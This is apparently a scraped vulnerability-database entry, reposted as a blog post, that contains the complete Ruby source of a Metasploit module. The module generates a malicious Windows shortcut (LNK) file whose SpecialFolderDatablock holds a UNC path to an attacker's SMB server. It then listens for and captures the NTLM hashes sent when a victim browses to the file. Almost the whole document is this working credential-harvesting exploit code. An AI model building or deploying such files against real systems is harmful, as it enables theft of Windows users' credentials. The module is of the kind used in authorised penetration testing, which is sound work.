{“lastseen”:”2025-10-01T21:38:24″,”description”:”This module creates a malicious Windows shortcut (LNK) file that specifies a special UNC path in SpecialFolderDatablock of Shell Link (.LNK) …”,”published”:”2025-10-01T18:56:05″,”modified”:”2025-10-01T18:56:05″,”type”:”metasploit”,”title”:”SpecialFolderDatablock – Windows LNK File Special UNC Path NTLM Leak”,”source”:””,”references”:””,”id”:”MSF:AUXILIARY-FILEFORMAT-SPECIALFOLDER_LEAK-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\nrequire ‘faker’\\n\\nclass MetasploitModule \\u003c Msf::Auxiliary\\n\\n include Msf::Exploit::FILEFORMAT\\n include Msf::Exploit::Remote::SMB::Server::Share\\n include Msf::Exploit::Remote::SMB::Server::HashCapture\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘SpecialFolderDatablock – Windows LNK File Special UNC Path NTLM Leak’,\\n ‘Description’ =\\u003e %q{\\n This module creates a malicious Windows shortcut (LNK) file that\\n specifies a special UNC path in SpecialFolderDatablock of Shell Link (.LNK)\\n that can trigger an authentication attempt to a remote server. This can be used\\n to harvest NTLM authentication credentials.\\n\\n When a victim browse to the location of the LNK file, it will attempt to\\n connect to the the specified UNC path, resulting in an SMB connection that\\n can be captured to harvest credentials.\\n },\\n ‘Author’ =\\u003e [ ‘Nafiez’ ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [\\n ‘URL’, ‘https:\/\/zeifan.my\/Right-Click-LNK\/’,\\n ‘EDB’, ‘42382’,\\n ]\\n ],\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Targets’ =\\u003e [ [ ‘Windows Universal’, {} ] ],\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK]\\n },\\n ‘DisclosureDate’ =\\u003e ‘2025-05-10’ # Disclosed to MSRC on 2025-05-10\\n )\\n )\\n\\n register_options([\\n OptString.new(‘APPNAME’, [ false, ‘Name of the application to display’, nil])\\n ])\\n end\\n\\n def generate_shell_link_header\\n header = ”\\n header \\u003c\\u003c [0x4C].pack(‘L’) # HeaderSize (4 bytes)\\n header \\u003c\\u003c [0x00021401, 0x0000, 0x0000, 0xC0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46].pack(‘LSSCCCCCCCC’) # LinkCLSID (16 bytes)\\n header \\u003c\\u003c [0x81].pack(‘L’) # LinkFlags (4 bytes): HasLinkTargetIDList + IsUnicode\\n header \\u003c\\u003c [0x00].pack(‘L’) # FileAttributes (4 bytes)\\n header \\u003c\\u003c [0x00].pack(‘Q’) # CreationTime (8 bytes)\\n header \\u003c\\u003c [0x00].pack(‘Q’) # AccessTime (8 bytes)\\n header \\u003c\\u003c [0x00].pack(‘Q’) # WriteTime (8 bytes)\\n header \\u003c\\u003c [0x00].pack(‘L’) # FileSize (4 bytes)\\n header \\u003c\\u003c [0x00].pack(‘L’) # IconIndex (4 bytes)\\n header \\u003c\\u003c [0x00].pack(‘L’) # ShowCommand (4 bytes)\\n header \\u003c\\u003c [0x00].pack(‘S’) # HotKey (2 bytes)\\n header \\u003c\\u003c [0x00].pack(‘S’) # Reserved1 (2 bytes)\\n header \\u003c\\u003c [0x00].pack(‘L’) # Reserved2 (4 bytes)\\n header \\u003c\\u003c [0x00].pack(‘L’) # Reserved3 (4 bytes)\\n\\n header\\n end\\n\\n def generate_item_id(data)\\n [data.length + 2].pack(‘S’) + data\\n end\\n\\n def generate_lnk_special(path, name)\\n # Force encoding to ASCII-8BIT (binary) to avoid encoding issues\\n path = path.dup.force_encoding(‘ASCII-8BIT’)\\n name = name.dup.force_encoding(‘ASCII-8BIT’)\\n\\n # Add null terminator\\n path += \\”\\\\x00\\”.force_encoding(‘ASCII-8BIT’)\\n name += \\”\\\\x00\\”.force_encoding(‘ASCII-8BIT’)\\n\\n # Convert to UTF-16LE manually\\n path_utf16 = path.encode(‘UTF-16LE’).force_encoding(‘ASCII-8BIT’)\\n name_utf16 = name.encode(‘UTF-16LE’).force_encoding(‘ASCII-8BIT’)\\n\\n # Remove BOM (first 2 bytes) if present\\n path_utf16 = path_utf16[2..] if path_utf16.start_with?(\\”\\\\xFF\\\\xFE\\”)\\n name_utf16 = name_utf16[2..] if name_utf16.start_with?(\\”\\\\xFF\\\\xFE\\”)\\n\\n bin_data = ”.force_encoding(‘ASCII-8BIT’)\\n bin_data \\u003c\\u003c \\”\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x6a\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\”.force_encoding(‘ASCII-8BIT’)\\n bin_data \\u003c\\u003c [path.length].pack(‘S’)\\n bin_data \\u003c\\u003c [name.length].pack(‘S’)\\n bin_data \\u003c\\u003c path_utf16\\n bin_data \\u003c\\u003c name_utf16\\n bin_data \\u003c\\u003c \\”\\\\x00\\\\x00\\”.force_encoding(‘ASCII-8BIT’) # comment\\n\\n bin_data\\n end\\n\\n def generate_linktarget_idlist(path, name)\\n idlist = ”.force_encoding(‘ASCII-8BIT’)\\n\\n # Reference – https:\/\/www.tenforums.com\/tutorials\/3123-clsid-key-guid-shortcuts-list-windows-10-a.html\\n\\n # First ItemID – My Computer \/ This PC\\n # {20D04FE0-3AEA-1069-A2D8-08002B30309D}\\n field_size_id1 = \\”\\\\x1f\\\\x50\\”\\n first_id = \\”\\\\xe0\\\\x4f\\\\xd0\\\\x20\\\\xea\\\\x3a\\\\x69\\\\x10\\\\xa2\\\\xd8\\\\x08\\\\x00\\\\x2b\\\\x30\\\\x30\\\\x9d\\”.force_encoding(‘ASCII-8BIT’)\\n idlist \\u003c\\u003c generate_item_id(field_size_id1 + first_id)\\n\\n # Second ItemID – Control Panel (All Tasks)\\n # {ED7BA470-8E54-465E-825C-99712043E01C}\\n field_size_id2 = \\”\\\\x2e\\\\x80\\”\\n second_id = \\”\\\\x20\\\\x20\\\\xec\\\\x21\\\\xea\\\\x3a\\\\x69\\\\x10\\\\xa2\\\\xdd\\\\x08\\\\x00\\\\x2b\\\\x30\\\\x30\\\\x9d\\”.force_encoding(‘ASCII-8BIT’)\\n idlist \\u003c\\u003c generate_item_id(field_size_id2 + second_id)\\n\\n # Custom ItemID – Our UNC path\\n idlist \\u003c\\u003c generate_item_id(generate_lnk_special(path, name))\\n\\n # TerminalID\\n idlist \\u003c\\u003c \\”\\\\x00\\\\x00\\”.force_encoding(‘ASCII-8BIT’)\\n\\n # Full IDList with size\\n [idlist.length].pack(‘S’) + idlist\\n end\\n\\n def generate_extra_data\\n extra = ”.force_encoding(‘ASCII-8BIT’)\\n extra \\u003c\\u003c [0x10].pack(‘L’) # BlockSize (4 bytes)\\n extra \\u003c\\u003c [0xA0000005].pack(‘L’) # SPECIAL_FOLDER_DATABLOCK_SIGNATURE (4 bytes)\\n extra \\u003c\\u003c [0x24].pack(‘L’) # SpecialFolderID (4 bytes) – Control Panel\\n extra \\u003c\\u003c [0x28].pack(‘L’) # Offset (4 bytes)\\n extra \\u003c\\u003c [0x00].pack(‘L’) # TERMINAL_BLOCK (4 bytes)\\n\\n extra\\n end\\n\\n def ms_shllink(path, name)\\n lnk_data = ”.force_encoding(‘ASCII-8BIT’)\\n lnk_data \\u003c\\u003c generate_shell_link_header\\n lnk_data \\u003c\\u003c generate_linktarget_idlist(path, name)\\n lnk_data \\u003c\\u003c generate_extra_data\\n\\n lnk_data\\n end\\n\\n def run\\n app_name = datastore[‘APPNAME’]\\n\\n app_name = \\”#{Faker::App.name}Application\\” if app_name.blank?\\n\\n start_service\\n unc_share = datastore[‘SHARE’]\\n unc_share = Rex::Text.rand_text_alphanumeric(6) if unc_share.blank?\\n unc_path = \\”\\\\\\\\\\\\\\\\#{datastore[‘SRVHOST’]}\\\\\\\\#{unc_share}\\”\\n\\n lnk_data = ms_shllink(unc_path, app_name)\\n file_create(lnk_data)\\n print_good(\\”LNK file created: #{datastore[‘FILENAME’]}\\”)\\n print_status(\\”Listening for hashes on #{datastore[‘SRVHOST’]}:#{datastore[‘SRVPORT’]}\\”)\\n stime = Time.now.to_f\\n timeout = datastore[‘ListenerTimeout’].to_i\\n loop do\\n break if timeout \\u003e 0 \\u0026\\u0026 (stime + timeout \\u003c Time.now.to_f)\\n\\n Rex::ThreadSafe.sleep(1)\\n end\\n end\\n\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/auxiliary\/fileformat\/specialfolder_leak.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/fileformat\/specialfolder_leak\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-01T21:38:24″,”description”:”This module creates a malicious Windows shortcut (LNK) file that specifies a special UNC path in SpecialFolderDatablock of Shell Link (.LNK) …”,”published”:”2025-10-01T18:56:05″,”modified”:”2025-10-01T18:56:05″,”type”:”metasploit”,”title”:”SpecialFolderDatablock – Windows LNK…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-19830","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n